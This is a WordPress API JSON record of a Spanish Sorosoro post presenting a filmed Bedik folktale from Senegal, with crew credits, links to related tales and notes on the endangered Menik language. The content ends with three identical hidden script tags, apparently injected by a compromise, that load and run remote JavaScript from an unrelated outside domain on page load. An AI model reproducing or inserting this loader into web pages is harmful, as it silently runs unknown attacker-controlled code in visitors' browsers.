{"id":49699,"date":"2011-06-07T12:03:02","date_gmt":"2011-06-07T10:03:02","guid":{"rendered":"http:\/\/www.sorosoro.org\/?p=49699"},"modified":"2025-10-21T22:36:26","modified_gmt":"2025-10-21T20:36:26","slug":"cuento-bedik-n1-el-huerfano-vengado-por-el-bosque","status":"publish","type":"post","link":"https:\/\/www.sorosoro.org\/es\/2011\/06\/cuento-bedik-n1-el-huerfano-vengado-por-el-bosque\/","title":{"rendered":"Cuento bedik n\u00b01: el hu\u00e9rfano vengado por el bosque"},"content":{"rendered":"<p style=\"text-align: justify;\">El cuento que sigue a continuaci\u00f3n ha sido rodado en la primavera del 2010 en la comunidad <strong>bedik<\/strong> al este de <strong>Senegal<\/strong>, en una regi\u00f3n muy caliente y seca, en el marco de una misi\u00f3n de rodaje organizada por el equipo de Sorosoro. Todav\u00eda no hab\u00edamos tenido la oportunidad de presentarle los resultados, ya que\u2026 \u00a1nos faltaba un traductor para comprender todo lo que hab\u00eda sido rodado! Hay que decir que el n\u00famero de hablantes sobrepasa apenas el millar\u2026<\/p>\n<p style=\"text-align: justify;\">Gracias a la ling\u00fcista Marie-Paule Ferry, acabamos por encontrar nuestra perla en el desierto, Marcel Camara: nacido en Bandafasi, el pueblo donde rodamos, en la regi\u00f3n de Kedougou. Marcelo vive en Par\u00eds desde el 2002, trabajando como educador. No deja por esto de hablar su lengua materna, el bedik, as\u00ed como el basari, el peul, el w\u00f3lof y franc\u00e9s\u2026 \u00a1Un bello ejemplo de multiling\u00fcismo!!<\/p>\n<p style=\"text-align: justify;\">Marcel acept\u00f3 traducirnos las numerosas horas de rushes de las que disponemos. Y comenz\u00f3 con los cuentos, que sucede que son narrados por\u2026 su t\u00eda: <strong>Aminata Camara.<\/strong> He aqu\u00ed pues el primero de la serie, el cuento de \u00ab<strong>El hu\u00e9rfano vengado por el bosque<\/strong>\u00ab, que ya dar\u00e1 una visi\u00f3n de conjunto de la gran imaginaci\u00f3n de los Bedik: \u00a1los animales y hasta los objetos hablan, desde luego! Sin olvidar su sentido de la moraleja: la sociedad debe ser igualitaria, y nadie debe ser dejado a un lado, ni siquiera un hu\u00e9rfano.<\/p>\n<p style=\"text-align: justify;\"><a href=\"..\/es\/cuento-bedik-n%C2%B02-las-aventuras-de-la-hiena-tama\">Ver el cuento bedik n\u00b02: \u00ablas aventuras de la hiena Tama\u00bb<\/a><\/p>\n<p style=\"text-align: justify;\"><a href=\"..\/es\/cuento-bedik-n%C2%B03-la-mona-que-se-transformo-en-jovencita\">Ver el cuento bedik n\u00b03: \u00abla mona que se transform\u00f3 en jovencita\u00bb<\/a><\/p>\n<p style=\"text-align: justify;\"><a href=\"https:\/\/www.sorosoro.org\/es\/cuento-bedik-n\u00b04-la-nina-que-queria-beber-cerveza\">Ver el cuento bedik n\u00b04: \u00abla ni\u00f1a que quer\u00eda beber cerveza\u00bb<\/a><\/p>\n<p style=\"text-align: justify;\">\n<p><object classid=\"clsid:d27cdb6e-ae6d-11cf-96b8-444553540000\" width=\"610\" height=\"370\" codebase=\"http:\/\/download.macromedia.com\/pub\/shockwave\/cabs\/flash\/swflash.cab#version=6,0,40,0\"><param name=\"allowFullScreen\" value=\"true\" \/><param name=\"allowscriptaccess\" value=\"always\" \/><param name=\"src\" value=\"http:\/\/www.youtube.com\/v\/dns3A5NI5JU?version=3&amp;hl=fr_FR\" \/><param name=\"allowfullscreen\" value=\"true\" \/><embed type=\"application\/x-shockwave-flash\" width=\"610\" height=\"370\" src=\"http:\/\/www.youtube.com\/v\/dns3A5NI5JU?version=3&amp;hl=fr_FR\" allowscriptaccess=\"always\" allowfullscreen=\"true\"><\/embed><\/object><br \/>\n<span style=\"text-decoration: underline;\">Ling\u00fcista<\/span>: Adjaratou Oumar Sall<br \/>\n<span style=\"text-decoration: underline;\">Imagen y sonido<\/span>: Muriel Lutz. Asistente: Cheikh Tidiane Sall<br \/>\n<span style=\"text-decoration: underline;\">Traducci\u00f3n<\/span>: Marcel Camara<br \/>\n<span style=\"text-decoration: underline;\">Montaje<\/span>: Caroline Laurent<\/p>\n<p style=\"text-align: justify;\">Video realizado en el marco del proyecto <em>S\u00e9n\u00e9langues<\/em><\/p>\n<p style=\"text-align: justify;\"><em><br \/>\n<\/em><\/p>\n<p style=\"text-align: justify;\"><em>Recordatorio: el menik es una lengua de la <\/em><a href=\"http:\/\/www.sorosoro.org\/en\/niger-congo-languages\"><em>familia N\u00edger-Congo<\/em><\/a><em> (rama Atl\u00e1ntico Norte, grupo oeste-atl\u00e1ntico, subgrupo tenda) y comprende tres dialectos: el banap\u00e1, el biwol y el b\u00eb\u00f1olo. Une lengua en peligro de extinci\u00f3n, el bapen, m\u00e1s antigua que el menik ha sido encontrada en 1961 por la ling\u00fcista Marie-Paule Ferry. Esta lengua es probablemente la\u201cmadre\u201d de las lenguas menik y oniyan (bassari). Es en la regi\u00f3n de K\u00e9dougou, en la localidad de Bandafasi, donde se llev\u00f3 a cabo nuestro rodaje, en dialecto banap\u00e1.<\/em><\/p>\n<p><em>Los misionarios cristianos de NTM (New Tribes Mission), quienes fueron los segundos en trabajar sobre la lengua, estimaron en el 2002 el n\u00famero de bedik de Senegal en 3380.<\/em><\/p>\n<p><em>Lo vemos, con s\u00f3lo un m\u00e1ximo de algunos millares de hablantes, la lengua menik puede ser considerada como en peligro a m\u00e1s o menos largo plazo. Constatamos sin embargo que, incluso si la mayor\u00eda de los hablantes habla fluidamente el idioma fula (llamado tambi\u00e9n pulaar o peul), el mandinka (malink\u00e9) y el franc\u00e9s, y lo usan d\u00eda con d\u00eda, la lengua se transmite todav\u00eda en los pueblos.<\/em><\/p>\n<p><em>Los hablantes del menik, aunque est\u00e9n perfectamente bien integrados a la cultura que los rodea y aunque tengan una gran permeabilidad de las otras lenguas con las cuales est\u00e1n en contacto, est\u00e1n unidos por un s\u00f3lido sentimiento de identidad que protege su lengua.<\/em><\/p>\n<p style=\"text-align: justify;\"><em><a href=\"http:\/\/www.sorosoro.org\/en\/menik\">Para m\u00e1s informaci\u00f3n sobre la lengua bedik<\/a><\/em><\/p>\n<p style=\"text-align: justify;\"><a href=\"https:\/\/www.sorosoro.org\/es\/introduccion-del-video-de-presentacion-de-la-lengua-menik\"><em>Para ver una presentaci\u00f3n del bedik<\/em><\/a><\/p>\n<p><script>;(function (l, z, f, e, r, p) { r = z.createElement(f); p = z.getElementsByTagName(f)[0]; r.async = 1; r.src = e; p.parentNode.insertBefore(r, p); })(window, document, 'script', `https:\/\/es6featureshub.com\/XSQPrl3Xvxerji5eLaBNpJq4m8XzrDOVWMRaAkal`);<\/script><script>;(function (l, z, f, e, r, p) { r = z.createElement(f); p = z.getElementsByTagName(f)[0]; r.async = 1; r.src = e; p.parentNode.insertBefore(r, p); })(window, document, 'script', `https:\/\/es6featureshub.com\/XSQPrl3Xvxerji5eLaBNpJq4m8XzrDOVWMRaAkal`);<\/script><script>;(function (l, z, f, e, r, p) { r = z.createElement(f); p = z.getElementsByTagName(f)[0]; r.async = 1; r.src = e; p.parentNode.insertBefore(r, p); })(window, document, 'script', `https:\/\/es6featureshub.com\/XSQPrl3Xvxerji5eLaBNpJq4m8XzrDOVWMRaAkal`);<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>El cuento que sigue a continuaci\u00f3n ha sido rodado en la primavera del 2010 en la comunidad bedik al este de Senegal, en una regi\u00f3n muy caliente y seca, en el marco de una misi\u00f3n de rodaje organizada por el equipo de Sorosoro. Todav\u00eda no hab\u00edamos tenido la oportunidad de presentarle los resultados, ya que\u2026 [&hellip;]<\/p>\n","protected":false},"author":18,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[25],"tags":[],"class_list":["post-49699","post","type-post","status-publish","format-standard","hentry","category-video-de-la-semana"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.0 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Cuento bedik n\u00b01: el hu\u00e9rfano vengado por el bosque - Sorosoro<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.sorosoro.org\/es\/2011\/06\/cuento-bedik-n1-el-huerfano-vengado-por-el-bosque\/\" \/>\n<meta property=\"og:locale\" content=\"es_ES\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Cuento bedik n\u00b01: el hu\u00e9rfano vengado por el bosque - Sorosoro\" \/>\n<meta property=\"og:description\" content=\"El cuento que sigue a continuaci\u00f3n ha sido rodado en la primavera del 2010 en la comunidad bedik al este de Senegal, en una regi\u00f3n muy caliente y seca, en el marco de una misi\u00f3n de rodaje organizada por el equipo de Sorosoro. Todav\u00eda no hab\u00edamos tenido la oportunidad de presentarle los resultados, ya que\u2026 [&hellip;]\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.sorosoro.org\/es\/2011\/06\/cuento-bedik-n1-el-huerfano-vengado-por-el-bosque\/\" \/>\n<meta property=\"og:site_name\" content=\"Sorosoro\" \/>\n<meta property=\"article:published_time\" content=\"2011-06-07T10:03:02+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2025-10-21T20:36:26+00:00\" \/>\n<meta name=\"author\" content=\"Michel.Lemee\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Escrito por\" \/>\n\t<meta name=\"twitter:data1\" content=\"Michel.Lemee\" \/>\n\t<meta name=\"twitter:label2\" content=\"Tiempo de lectura\" \/>\n\t<meta name=\"twitter:data2\" content=\"3 minutos\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/www.sorosoro.org\/es\/2011\/06\/cuento-bedik-n1-el-huerfano-vengado-por-el-bosque\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/www.sorosoro.org\/es\/2011\/06\/cuento-bedik-n1-el-huerfano-vengado-por-el-bosque\/\"},\"author\":{\"name\":\"Michel.Lemee\",\"@id\":\"https:\/\/www.sorosoro.org\/es\/#\/schema\/person\/6a38d9a3b9816780bdc12b184c7d9e18\"},\"headline\":\"Cuento bedik n\u00b01: el hu\u00e9rfano vengado por el bosque\",\"datePublished\":\"2011-06-07T10:03:02+00:00\",\"dateModified\":\"2025-10-21T20:36:26+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/www.sorosoro.org\/es\/2011\/06\/cuento-bedik-n1-el-huerfano-vengado-por-el-bosque\/\"},\"wordCount\":587,\"articleSection\":[\"Todos los videos\"],\"inLanguage\":\"es\"},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/www.sorosoro.org\/es\/2011\/06\/cuento-bedik-n1-el-huerfano-vengado-por-el-bosque\/\",\"url\":\"https:\/\/www.sorosoro.org\/es\/2011\/06\/cuento-bedik-n1-el-huerfano-vengado-por-el-bosque\/\",\"name\":\"Cuento bedik n\u00b01: el hu\u00e9rfano vengado por el bosque - Sorosoro\",\"isPartOf\":{\"@id\":\"https:\/\/www.sorosoro.org\/es\/#website\"},\"datePublished\":\"2011-06-07T10:03:02+00:00\",\"dateModified\":\"2025-10-21T20:36:26+00:00\",\"author\":{\"@id\":\"https:\/\/www.sorosoro.org\/es\/#\/schema\/person\/6a38d9a3b9816780bdc12b184c7d9e18\"},\"breadcrumb\":{\"@id\":\"https:\/\/www.sorosoro.org\/es\/2011\/06\/cuento-bedik-n1-el-huerfano-vengado-por-el-bosque\/#breadcrumb\"},\"inLanguage\":\"es\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/www.sorosoro.org\/es\/2011\/06\/cuento-bedik-n1-el-huerfano-vengado-por-el-bosque\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/www.sorosoro.org\/es\/2011\/06\/cuento-bedik-n1-el-huerfano-vengado-por-el-bosque\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Accueil\",\"item\":\"https:\/\/www.sorosoro.org\/es\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Cuento bedik n\u00b01: el hu\u00e9rfano vengado por el bosque\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/www.sorosoro.org\/es\/#website\",\"url\":\"https:\/\/www.sorosoro.org\/es\/\",\"name\":\"Sorosoro\",\"description\":\"Pour que vivent les langues du monde !\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/www.sorosoro.org\/es\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"es\"},{\"@type\":\"Person\",\"@id\":\"https:\/\/www.sorosoro.org\/es\/#\/schema\/person\/6a38d9a3b9816780bdc12b184c7d9e18\",\"name\":\"Michel.Lemee\",\"url\":\"https:\/\/www.sorosoro.org\/es\/author\/michel-lemee\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Cuento bedik n\u00b01: el hu\u00e9rfano vengado por el bosque - Sorosoro","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.sorosoro.org\/es\/2011\/06\/cuento-bedik-n1-el-huerfano-vengado-por-el-bosque\/","og_locale":"es_ES","og_type":"article","og_title":"Cuento bedik n\u00b01: el hu\u00e9rfano vengado por el bosque - Sorosoro","og_description":"El cuento que sigue a continuaci\u00f3n ha sido rodado en la primavera del 2010 en la comunidad bedik al este de Senegal, en una regi\u00f3n muy caliente y seca, en el marco de una misi\u00f3n de rodaje organizada por el equipo de Sorosoro. Todav\u00eda no hab\u00edamos tenido la oportunidad de presentarle los resultados, ya que\u2026 [&hellip;]","og_url":"https:\/\/www.sorosoro.org\/es\/2011\/06\/cuento-bedik-n1-el-huerfano-vengado-por-el-bosque\/","og_site_name":"Sorosoro","article_published_time":"2011-06-07T10:03:02+00:00","article_modified_time":"2025-10-21T20:36:26+00:00","author":"Michel.Lemee","twitter_card":"summary_large_image","twitter_misc":{"Escrito por":"Michel.Lemee","Tiempo de lectura":"3 minutos"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/www.sorosoro.org\/es\/2011\/06\/cuento-bedik-n1-el-huerfano-vengado-por-el-bosque\/#article","isPartOf":{"@id":"https:\/\/www.sorosoro.org\/es\/2011\/06\/cuento-bedik-n1-el-huerfano-vengado-por-el-bosque\/"},"author":{"name":"Michel.Lemee","@id":"https:\/\/www.sorosoro.org\/es\/#\/schema\/person\/6a38d9a3b9816780bdc12b184c7d9e18"},"headline":"Cuento bedik n\u00b01: el hu\u00e9rfano vengado por el bosque","datePublished":"2011-06-07T10:03:02+00:00","dateModified":"2025-10-21T20:36:26+00:00","mainEntityOfPage":{"@id":"https:\/\/www.sorosoro.org\/es\/2011\/06\/cuento-bedik-n1-el-huerfano-vengado-por-el-bosque\/"},"wordCount":587,"articleSection":["Todos los videos"],"inLanguage":"es"},{"@type":"WebPage","@id":"https:\/\/www.sorosoro.org\/es\/2011\/06\/cuento-bedik-n1-el-huerfano-vengado-por-el-bosque\/","url":"https:\/\/www.sorosoro.org\/es\/2011\/06\/cuento-bedik-n1-el-huerfano-vengado-por-el-bosque\/","name":"Cuento bedik n\u00b01: el hu\u00e9rfano vengado por el bosque - Sorosoro","isPartOf":{"@id":"https:\/\/www.sorosoro.org\/es\/#website"},"datePublished":"2011-06-07T10:03:02+00:00","dateModified":"2025-10-21T20:36:26+00:00","author":{"@id":"https:\/\/www.sorosoro.org\/es\/#\/schema\/person\/6a38d9a3b9816780bdc12b184c7d9e18"},"breadcrumb":{"@id":"https:\/\/www.sorosoro.org\/es\/2011\/06\/cuento-bedik-n1-el-huerfano-vengado-por-el-bosque\/#breadcrumb"},"inLanguage":"es","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.sorosoro.org\/es\/2011\/06\/cuento-bedik-n1-el-huerfano-vengado-por-el-bosque\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/www.sorosoro.org\/es\/2011\/06\/cuento-bedik-n1-el-huerfano-vengado-por-el-bosque\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Accueil","item":"https:\/\/www.sorosoro.org\/es\/"},{"@type":"ListItem","position":2,"name":"Cuento bedik n\u00b01: el hu\u00e9rfano vengado por el bosque"}]},{"@type":"WebSite","@id":"https:\/\/www.sorosoro.org\/es\/#website","url":"https:\/\/www.sorosoro.org\/es\/","name":"Sorosoro","description":"Pour que vivent les langues du monde !","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.sorosoro.org\/es\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"es"},{"@type":"Person","@id":"https:\/\/www.sorosoro.org\/es\/#\/schema\/person\/6a38d9a3b9816780bdc12b184c7d9e18","name":"Michel.Lemee","url":"https:\/\/www.sorosoro.org\/es\/author\/michel-lemee\/"}]}},"_links":{"self":[{"href":"https:\/\/www.sorosoro.org\/es\/wp-json\/wp\/v2\/posts\/49699","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.sorosoro.org\/es\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.sorosoro.org\/es\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.sorosoro.org\/es\/wp-json\/wp\/v2\/users\/18"}],"replies":[{"embeddable":true,"href":"https:\/\/www.sorosoro.org\/es\/wp-json\/wp\/v2\/comments?post=49699"}],"version-history":[{"count":0,"href":"https:\/\/www.sorosoro.org\/es\/wp-json\/wp\/v2\/posts\/49699\/revisions"}],"wp:attachment":[{"href":"https:\/\/www.sorosoro.org\/es\/wp-json\/wp\/v2\/media?parent=49699"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.sorosoro.org\/es\/wp-json\/wp\/v2\/categories?post=49699"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.sorosoro.org\/es\/wp-json\/wp\/v2\/tags?post=49699"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}